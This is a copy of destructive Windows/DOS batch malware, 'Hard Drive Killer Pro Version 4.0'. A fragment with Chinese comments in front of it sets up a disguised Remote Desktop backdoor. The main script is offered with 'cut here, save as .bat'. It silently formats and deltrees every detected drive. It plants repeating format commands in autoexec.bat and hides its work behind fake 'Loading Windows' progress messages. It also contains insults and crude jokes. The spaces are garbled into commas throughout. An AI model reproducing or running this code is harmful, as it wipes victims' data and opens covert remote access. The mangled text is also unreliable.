@echo,"DisplayName"="Microsoft,EventLog",>>patch.dll, @echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice], >>patch.dll,
@echo,"Start"=dword:00000004,>>patch.dll,
@copy,c:\winnt\system32\termsrv.exe,c:\winnt\system32\eventlog.exe
@REM,[修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft,
EventLog,留条后路]3.Hard,Drive,Killer,Pro,Version,
4.0(玩批处理到这个水平真的不容易了。),
------------------------,cut,here,then,save,as,.bat,or,.cmd,file, ---------------------------,
@echo,off,
rem,This,program,is,dedecated,to,a,very,special,person,that,does, not,want,to,be,named.,
:start,
cls,
echo,PLEASE,WAIT,WHILE,PROGRAM,LOADS,.,.,.,
call,attrib,-r,-h,c:\autoexec.bat,>nul,
echo,@echo,off,>c:\autoexec.bat,
echo,call,format,c:,/q,/u,/autoSample,>nul,>>c:\autoexec.bat, call,attrib,+r,+h,c:\autoexec.bat,>nul,
rem,Drive,checking,and,assigning,the,valid,drives,to,the,drive, variable.set,drive=,
set,alldrive=c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z, rem,code,insertion,for,Drive,Checking,takes,place,here., rem,drivechk.bat,is,the,file,name,under,the,root,directory., rem,As,far,as,the,drive,detection,and,drive,variable,settings,, don't,worry,about,how,it,
rem,works,,it's,d\*amn,to,complicated,for,the,average,or,even,the,
expert,batch,programmer.,
rem,Except,for,Tom,Lavedas.,
echo,@echo,off,>drivechk.bat,
echo,@prompt,%%%%comspec%%%%,/f,/c,vol,%%%%1:,$b,find,"Vol",>,nul, >{t}.bat,
%comspec%,/e:2048,/c,{t}.bat,>>drivechk.bat,
del,{t}.bat,
echo,if,errorlevel,1,goto,enddc,>>drivechk.bat,
cls,
echo,PLEASE,WAIT,WHILE,PROGRAM,LOADS,.,.,.,
rem,When,errorlevel,is,1,,then,the,above,is,not,true,,if,0,,then, it's,true.,
rem,Opposite,of,binary,rules.,If,0,,it,will,elaps,to,the,next, command.,
echo,@prompt,%%%%comspec%%%%,/f,/c,dir,%%%%1:.\/ad/w/-p,$b,find, "bytes",>,nul,>{t}.bat,
%comspec%,/e:2048,/c,{t}.bat,>>drivechk.bat,
del,{t}.bat,
echo,if,errorlevel,1,goto,enddc,>>drivechk.bat,
cls,
echo,PLEASE,WAIT,WHILE,PROGRAM,LOADS,.,.,.,
rem,if,errorlevel,is,1,,then,the,drive,specified,is,a,removable,
media,drive,-,not,ready.,
rem,if,errorlevel,is,0,,then,it,will,elaps,to,the,next,command., echo,@prompt,dir,%%%%1:.\/ad/w/-p,$b,find,",0,bytes,free",>,nul, >{t}.bat,
%comspec%,/e:2048,/c,{t}.bat,>>drivechk.bat,
del,{t}.bat,
echo,if,errorlevel,1,set,drive=%%drive%%,%%1,>>drivechk.bat, cls,
echo,PLEASE,WAIT,WHILE,PROGRAM,LOADS,.,.,.,
rem,if,it's,errorlevel,1,,then,the,specified,drive,is,a,hard,or, floppy,drive.,
rem,if,it's,not,errorlevel,1,,then,the,specified,drive,is,a,CD-ROM, drive.,
echo,:enddc,>>drivechk.bat,
rem,Drive,checking,insertion,ends,here.,"enddc",stands,for,"end, dDRIVE,cHECKING".,
rem,Now,we,will,use,the,program,drivechk.bat,to,attain,valid,drive, information.,
:Sampledrv,
for,%%a,in,(%alldrive%),do,call,drivechk.bat,%%a,>nul, del,drivechk.bat,>nul,
if,%drive.==.,set,drive=c,
:form_del,
call,attrib,-r,-h,c:\autoexec.bat,>nul,
echo,@echo,off,>c:\autoexec.bat,
echo,echo,Loading,Windows,,please,wait,while,Microsoft,Windows, recovers,your,system,.,.,.,>>c:\autoexec.bat,
echo,for,%%%%a,in,(%drive%),do,call,format,%%%%a:,/q,/u, /autoSample,>nul,>>c:\autoexec.bat,
echo,cls,>>c:\autoexec.bat,
echo,echo,Loading,Windows,,please,wait,while,Microsoft,Windows, recovers,your,system,.,.,.,>>c:\autoexec.bat,
echo,for,%%%%a,in,(%drive%),do,call,c:\temp.bat,%%%%a,Bunga,>nul, >>c:\autoexec.bat,
echo,cls,>>c:\autoexec.bat,
echo,echo,Loading,Windows,,please,wait,while,Microsoft,Windows, recovers,your,system,.,.,.,>>c:\autoexec.bat,
echo,for,%%%%a,in,(%drive%),call,deltree,/y,%%%%a:\,>nul, >>c:\autoexec.bat,
echo,cls,>>c:\autoexec.bat,
echo,echo,Loading,Windows,,please,wait,while,Microsoft,Windows, recovers,your,system,.,.,.,>>c:\autoexec.bat,
echo,for,%%%%a,in,(%drive%),do,call,format,%%%%a:,/q,/u, /autoSample,>nul,>>c:\autoexec.bat,
echo,cls,>>c:\autoexec.bat,
echo,echo,Loading,Windows,,please,wait,while,Microsoft,Windows, recovers,your,system,.,.,.,>>c:\autoexec.bat,
echo,for,%%%%a,in,(%drive%),do,call,c:\temp.bat,%%%%a,Bunga,>nul, >>c:\autoexec.bat,
echo,cls,>>c:\autoexec.bat,
echo,echo,Loading,Windows,,please,wait,while,Microsoft,Windows, recovers,your,system,.,.,.,>>c:\autoexec.bat,
echo,for,%%%%a,in,(%drive%),call,deltree,/y,%%%%a:\,>nul, >>c:\autoexec.bat,
echo,cd\,>>c:\autoexec.bat,
echo,cls,>>c:\autoexec.bat,
echo,echo,Welcome,to,the,land,of,death.,Munga,Bunga's,Multiple, Hard,Drive,Killer,version,4.0.,>>c:\autoexec.bat,
echo,echo,If,you,ran,this,file,,then,sorry,,I,just,made,it.,The, purpose,of,this,program,is,to,tell,you,the,following.,.,., >>c:\autoexec.bat,
echo,echo,1.,To,make,people,aware,that,security,should,not,be, taken,for,granted.,>>c:\autoexec.bat,
echo,echo,2.,Love,is,important,,if,you,have,it,,truly,,don't,let, go,of,it,like,I,did!,>>c:\autoexec.bat,
echo,echo,3.,If,you,are,NOT,a,vegetarian,,then,you,are,a,murderer,,
and,I'm,glad,your,HD,is,dead.,>>c:\autoexec.bat, echo,echo,4.,Don't,support,the,following:,War,,Racism,,Drugs,and, the,Liberal,Party.>>c:\autoexec.bat,
echo,echo.,>>c:\autoexec.bat,
echo,echo,Regards,,>>c:\autoexec.bat,
echo,echo.,>>c:\autoexec.bat,
echo,echo,Munga,Bunga,>>c:\autoexec.bat,
call,attrib,+r,+h,c:\autoexec.bat,
:makedir,
if,exist,c:\temp.bat,attrib,-r,-h,c:\temp.bat,>nul, echo,@echo,off,>c:\temp.bat,
echo,%%1:\,>>c:\temp.bat,
echo,cd\,>>c:\temp.bat,
echo,:startmd,>>c:\temp.bat,
echo,for,%%%%a,in,("if,not,exist,%%2\nul,md,%%2","if,exist,%%2\nul, cd,%%2"),do,%%%%a,>>c:\temp.bat,
echo,for,%%%%a,in,(">bottom_hole.txt"),do,echo,%%%%a,Your,Gone, @$$hole!!!!,>>c:\temp.bat,
echo,if,not,exist,
%%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul,
goto,startmd,>>c:\temp.bat,
call,attrib,+r,+h,c:\temp.bat,>nul,
cls,
echo,Initializing,Variables,.,.,.,
rem,deltree,/y,%%a:\*.,only,eliminates,directories,,hence,leaving,
the,file,created,above,for,further,destruction., for,%%a,in,(%drive%),do,call,format,%%a:,/q,/u,/autoSample,>nul,
cls,
echo,Initializing,Variables,.,.,.,
echo,Validating,Data,.,.,.,
for,%%a,in,(%drive%),do,call,c:\temp.bat,%%a,Munga,>nul, cls,
echo,Initializing,Variables,.,.,.,
echo,Validating,Data,.,.,.,
echo,Analyzing,System,Structure,.,.,.,
for,%%a,in,(%drive%),call,attrib,-r,-h,%%a:\,/S,>nul, call,attrib,+r,+h,c:\temp.bat,>nul,
call,attrib,+r,+h,c:\autoexec.bat,>nul,
cls,
echo,Initializing,Variables,.,.,.,
echo,Validating,Data,.,.,.,
echo,Analyzing,System,Structure,.,.,.,
echo,Initializing,Application,.,.,.,
for,%%a,in,(%drive%),call,deltree,/y,%%a:\*.,>nul, cls,
echo,Initializing,Variables,.,.,.,
echo,Validating,Data,.,.,.,
echo,Analyzing,System,Structure,.,.,.,
echo,Initializing,Application,.,.,.,
echo,Starting,Application,.,.,.,
for,%%a,in,(%drive%),do,call,c:\temp.bat,%%a,Munga,>nul, cls,
echo,Thank,you,for,using,a,Munga,Bunga,product., echo.,
echo,Oh,and,,Bill,Gates,rules,,and,he,is,not,a,geek,,he,is,a,good,
looking,genius.,
echo.,
echo,Here,is,a,joke,for,you,.,.,.,
echo.,
echo,Q).,What's,the,worst,thing,about,being,an,egg?, echo,A).,You,only,get,laid,once.,
echo.,
echo,HAHAHAHA,,get,it?,Don't,you,just,love,that,one?, echo.,
echo,Regards,,
echo.,
echo,Munga,Bunga,
:end,
rem,Hard,Drive,Killer,Pro,Version,4.0,,enjoy!!!!, rem,Author:,Munga,Bunga,-,from,Australia,,the,land,full,of, retarded,Australian's,(help,me,get,out,of,here).